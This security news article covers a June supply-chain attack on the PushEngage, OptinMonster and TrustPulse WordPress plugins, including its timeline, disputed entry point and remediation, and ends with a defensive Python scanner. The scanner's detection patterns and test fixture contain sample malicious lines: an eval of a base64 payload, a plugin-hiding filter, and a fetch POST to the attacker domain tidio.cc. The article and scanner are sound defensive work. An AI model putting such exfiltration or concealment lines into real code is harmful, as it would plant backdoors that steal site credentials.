Critical WordPress Plugins Compromised: Millions of Sites Exposed to Hidden Backdoors
A sophisticated cyberattack has targeted widely used WordPress plugins, including PushEngage, OptinMonster, and TrustPulse, by injecting malicious code into their trusted JavaScript files. This breach allowed attackers to create hidden administrative accounts and install persistent backdoors on affected websites, posing a significant threat to over a million WordPress installations.
The Anatomy of the Attack: How Backdoors Were Planted
The attackers cleverly designed their malicious script to activate only when a logged-in WordPress administrator accessed a compromised site. Upon execution, the script leveraged the administrator’s session to:
- Create a new, attacker-controlled administrative account.
- Install a stealthy plugin designed to remain invisible within the WordPress dashboard.
- Transmit the new login credentials and site information to a fake domain, tidio[.]cc, mimicking the legitimate tidio.com.
This method ensured that ordinary site visitors remained unaffected, making the breach particularly insidious as it targeted the very individuals responsible for site security. The hidden plugin, once installed, established a “web shell” – a remote command channel allowing the attacker to execute arbitrary code on the server without needing to log in. This grants them full control, enabling data theft, further backdoor installation, content manipulation, or even credit card skimming.
Security firm Sansec, which first unveiled the broader campaign on June 13, confirmed the presence of this malicious code across all three plugins. PushEngage later issued its own incident notice, corroborating the attack and warning users of potential site compromise. The registration of the tidio[.]cc domain weeks before the attack suggests a premeditated, well-orchestrated operation rather than an opportunistic strike.
The Scale and Scope of the Compromise
All three affected plugins are under the umbrella of Awesome Motive. While PushEngage, acquired by Awesome Motive years ago, was the first to provide official guidance, users of OptinMonster and TrustPulse initially received no direct communication, raising concerns within the community.
The exposure window varied significantly:
- OptinMonster and TrustPulse: Malicious code was active for approximately 25 minutes on June 12 (22:17 UTC to 22:42 UTC).
- PushEngage: The exposure was more prolonged, lasting several hours on June 12, with tampered scripts still being served from some CDN servers into June 14.
Despite the shorter window for OptinMonster and TrustPulse, these plugins boast a massive user base. Sansec estimates that collectively, the three plugins reach over 1.2 million sites, with OptinMonster alone accounting for more than a million active installations. PushEngage’s WordPress plugin has over 9,000 installs. It’s crucial to note that these figures represent the reach of the plugins, not necessarily the number of sites actually compromised, though any site that loaded the malicious script while an admin was logged in should be considered compromised.
The Entry Point: A Disputed Narrative
The precise method by which the attackers gained initial access remains a point of contention between PushEngage and Sansec.
- PushEngage’s Account: The company suggests the attacker first breached its marketing website server, exploiting a known vulnerability in the UpdraftPlus WordPress backup plugin. Crucially, this server, though separate from core product systems, contained a CDN API key. This key allowed the attacker to manipulate the JavaScript files delivered via the Content Delivery Network (CDN) to customer sites without directly compromising PushEngage’s main infrastructure.
- Sansec’s Perspective: Sansec remains unconvinced about the definitive entry point. While acknowledging the possibility of a CDN account compromise, they lean towards Awesome Motive’s own servers as the most likely breached system, deeming the CDN provider (BunnyNet) an improbable vector. Sansec’s public analysis does not validate the UpdraftPlus theory, which PushEngage provided solely regarding its own environment.
It’s worth noting that UpdraftPlus did have a separate, high-severity authentication-bypass bug (CVE-2026-10795), which has since been patched. Wordfence has reported active attacks against this vulnerability, underscoring the importance of keeping all plugins updated.
Immediate Actions for Affected Sites
Given the nature of the backdoor, simply removing the visible malicious plugin or the newly created admin account may not be sufficient. Both Sansec and PushEngage strongly advise treating any potentially affected site as fully compromised. This means:
- Full Audit: Conduct a thorough security audit of your server and database.
- Clean Installation: Consider a clean installation from a known good backup, followed by a complete password reset for all users.
- Vigilance: Monitor for any unusual activity or new files on your server.
- Update Everything: Ensure all WordPress core files, themes, and plugins (especially UpdraftPlus, if used) are updated to their latest versions.
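The audit steps above can be partly scripted. The following is an added example (not from the article, Sansec or PushEngage) that scans a wp-content/plugins tree for self-hiding plugins, decoded-payload evals and references to the tidio.cc exfiltration domain, and lists administrator accounts registered after a cutoff such as the start of the exposure window. The 'all_plugins' filter and eval patterns are generic heuristics, not indicators published for this incident; the SQLite tables, sample files and dates are constructed stand-ins for the real MySQL database and plugin directory.

```python
import re
import sqlite3
import tempfile
from pathlib import Path

# Heuristics (assumed, not published IoCs): self-hiding plugins commonly filter
# 'all_plugins'; web shells commonly eval a decoded payload; tidio.cc is the domain named above.
SUSPECT = {
    "hides-from-plugin-list": re.compile(r"add_filter\(\s*['\"]all_plugins['\"]"),
    "evals-decoded-payload": re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
    "references-tidio-cc": re.compile(r"tidio\.cc"),
}


def scan_plugins(plugins_dir):
    """Return sorted (relative path, finding) pairs for PHP/JS files matching a heuristic."""
    hits = []
    for path in Path(plugins_dir).rglob("*"):
        if path.suffix in (".php", ".js"):
            text = path.read_text(encoding="utf-8", errors="replace")
            rel = str(path.relative_to(plugins_dir))
            hits += [(rel, label) for label, rx in SUSPECT.items() if rx.search(text)]
    return sorted(hits)


def find_new_admins(conn, since):
    """Administrator accounts registered at or after `since` (UTC 'YYYY-MM-DD HH:MM:SS')."""
    return conn.execute(
        """SELECT u.user_login, u.user_registered FROM wp_users u
           JOIN wp_usermeta m ON m.user_id = u.ID
           WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%'
             AND u.user_registered >= ? ORDER BY u.user_registered""", (since,)).fetchall()


def build_fixture():
    """Constructed sample: a self-hiding plugin, a clean plugin, a tampered JS copy, two admins."""
    d = Path(tempfile.mkdtemp())
    for rel, body in {
        "wp-helper/wp-helper.php": "<?php add_filter('all_plugins', 'wph_hide');\neval(base64_decode('...'));",
        "hello/hello.php": "<?php echo 'Hello';",
        "vendor-sdk/sdk.js": "fetch('https://tidio.cc/c', {method: 'POST'});",
    }.items():
        (d / rel).parent.mkdir(parents=True)
        (d / rel).write_text(body, encoding="utf-8")
    conn = sqlite3.connect(":memory:")  # constructed stand-in for the MySQL wp_ tables
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_users VALUES (1, 'owner', '2020-01-05 09:00:00'), (7, 'wpsupport', '2026-06-12 23:05:41');
        INSERT INTO wp_usermeta VALUES (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (7, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
    """)
    return d, conn
```

On a real site, point scan_plugins at wp-content/plugins and run the same query against MySQL with the table prefix your install uses; any hit warrants the full audit the article recommends, not just deletion of the flagged file or account.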
This incident serves as a stark reminder of the critical importance of robust security practices and continuous vigilance in the WordPress ecosystem.